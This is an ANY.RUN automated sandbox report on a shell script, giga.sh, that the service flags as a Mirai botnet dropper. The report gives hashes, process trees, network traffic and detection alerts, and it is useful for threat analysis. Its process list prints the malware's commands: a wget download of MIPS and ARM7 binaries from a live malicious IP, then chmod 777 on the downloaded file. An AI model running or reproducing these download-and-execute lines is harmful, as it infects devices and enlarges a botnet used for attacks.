Malware analysis giga.sh Malicious activity | ANY.RUN

Add for printing

File name:	giga.sh
Full analysis:	https://app.any.run/tasks/3568ab18-3c31-4987-af62-acb73503b261
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	May 17, 2025, 08:45:03
OS:	Ubuntu 22.04.2
Tags:	mirai botnet
Indicators:
MIME:	text/plain
File info:	ASCII text
MD5:	CFBFD14F3C20AB1968036A2EE60C6FB7
SHA1:	3533CB6612C9A472F87C4EFFF5844E3EDEAC455B
SHA256:	E97D38896F7A0020EDBE5753DD7B3E154857CAEBC31CEE880E083CA7F16EA79A
SSDEEP:	6:LMFFEZqjGkNYC/PamRDMFFEZmapLkNYCzXkG:oSZqqkNYuamKSZmadkNYqkG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- MIRAI has been detected (SURICATA)
  - wget (PID: 39870)
SUSPICIOUS
- Executes commands using command-line interpreter
  - sudo (PID: 39867)
  - bash (PID: 39868)
- Modifies file or directory owner
  - sudo (PID: 39864)
- Uses wget to download content
  - bash (PID: 39868)
- Executes the "rm" command to delete files or directories
  - bash (PID: 39868)
- Potential Corporate Privacy Violation
  - wget (PID: 39870)
  - wget (PID: 39875)
- Connects to the server without a host name
  - wget (PID: 39870)
  - wget (PID: 39875)
INFO
- Checks timezone
  - wget (PID: 39870)
  - wget (PID: 39875)
- Creates file in the temporary folder
  - wget (PID: 39875)
  - wget (PID: 39870)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

146

Monitored processes

15

Malicious processes

2

Suspicious processes

1

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

39863

/bin/sh -c "sudo chown user /tmp/giga\.sh && chmod +x /tmp/giga\.sh && DISPLAY=:0 sudo -iu user /tmp/giga\.sh "

/usr/bin/dash

—

oF5qt7VjSoEVMhQn

User:

root

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

39864

sudo chown user /tmp/giga.sh

/usr/bin/sudo

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11

39865

chown user /tmp/giga.sh

/usr/bin/chown

—

sudo

User:

root

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

39866

chmod +x /tmp/giga.sh

/usr/bin/chmod

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

39867

sudo -iu user /tmp/giga.sh

/usr/bin/sudo

—

dash

User:

root

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11

39868

-bash --login -c \/tmp\/giga\.sh

/usr/bin/bash

—

sudo

User:

user

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6

39869

/usr/bin/locale-check C.UTF-8

/usr/bin/locale-check

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

39870

wget http://103.188.82.240/skid.mips -O suckmynuts

/usr/bin/wget

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0

39871

chmod 777 suckmynuts

/usr/bin/chmod

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

0

Modules

Images
/usr/lib/x86_64-linux-gnu/libc.so.6

39872

-bash --login -c \/tmp\/giga\.sh

/usr/bin/bash

—

bash

User:

user

Integrity Level:

UNKNOWN

Exit code:

32256

Add for printing

Executable files

0

Suspicious files

2

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
39870	wget	/tmp/suckmynuts		binary
		MD5:—	SHA256:—
39875	wget	/tmp/suckmynuts		binary
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

4

TCP/UDP connections

12

DNS requests

12

Threats

6

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.49:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
—	—	GET	204	91.189.91.49:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
39870	wget	GET	200	103.188.82.240:80	http://103.188.82.240/skid.mips	unknown	—	—	malicious
39875	wget	GET	200	103.188.82.240:80	http://103.188.82.240/skid.arm7	unknown	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	91.189.91.49:80	connectivity-check.ubuntu.com	Canonical Group Limited	US	whitelisted
—	—	37.19.194.80:443	odrs.gnome.org	Datacamp Limited	DE	whitelisted
—	—	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.59:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
39870	wget	103.188.82.240:80	—	Bach Kim Network solutions Join stock company	VN	malicious
39875	wget	103.188.82.240:80	—	Bach Kim Network solutions Join stock company	VN	malicious

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	91.189.91.49 91.189.91.98 185.125.190.98 185.125.190.18 185.125.190.17 185.125.190.96 91.189.91.96 185.125.190.97 91.189.91.48 185.125.190.49 185.125.190.48 2620:2d:4000:1::98 2620:2d:4002:1::196 2001:67c:1562::23 2620:2d:4000:1::97 2620:2d:4000:1::2a 2620:2d:4000:1::22 2620:2d:4002:1::198 2620:2d:4000:1::23 2620:2d:4000:1::2b 2001:67c:1562::24 2620:2d:4000:1::96	whitelisted
google.com	172.217.16.142 2a00:1450:4001:80b::200e	whitelisted
odrs.gnome.org	37.19.194.80 207.211.211.27 195.181.175.41 169.150.255.183 195.181.170.19 169.150.255.181 212.102.56.179 2a02:6ea0:c700::11 2a02:6ea0:c700::112 2a02:6ea0:c700::21 2a02:6ea0:c700::18 2a02:6ea0:c700::107 2a02:6ea0:c700::101 2a02:6ea0:c700::19	whitelisted
api.snapcraft.io	185.125.188.59 185.125.188.58 185.125.188.54 185.125.188.57 2620:2d:4000:1010::344 2620:2d:4000:1010::2e6 2620:2d:4000:1010::117 2620:2d:4000:1010::42	whitelisted
11.100.168.192.in-addr.arpa	—	unknown

Threats

PID	Process	Class	Message
39870	wget	A Network Trojan was detected	AV INFO Possible Mirai .mips Executable Download
39870	wget	Potentially Bad Traffic	ET INFO MIPS File Download Request from IP Address
39870	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
39875	wget	Potentially Bad Traffic	ET INFO ARM7 File Download Request from IP Address
39875	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
39875	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

giga.sh

CFBFD14F3C20AB1968036A2EE60C6FB7

3533CB6612C9A472F87C4EFFF5844E3EDEAC455B

E97D38896F7A0020EDBE5753DD7B3E154857CAEBC31CEE880E083CA7F16EA79A

6:LMFFEZqjGkNYC/PamRDMFFEZmapLkNYCzXkG:oSZqqkNYuamKSZmadkNYqkG

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been detected (SURICATA)

SUSPICIOUS

Executes commands using command-line interpreter

Modifies file or directory owner

Uses wget to download content

Executes the "rm" command to delete files or directories

Potential Corporate Privacy Violation

Connects to the server without a host name

INFO

Checks timezone

Creates file in the temporary folder

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings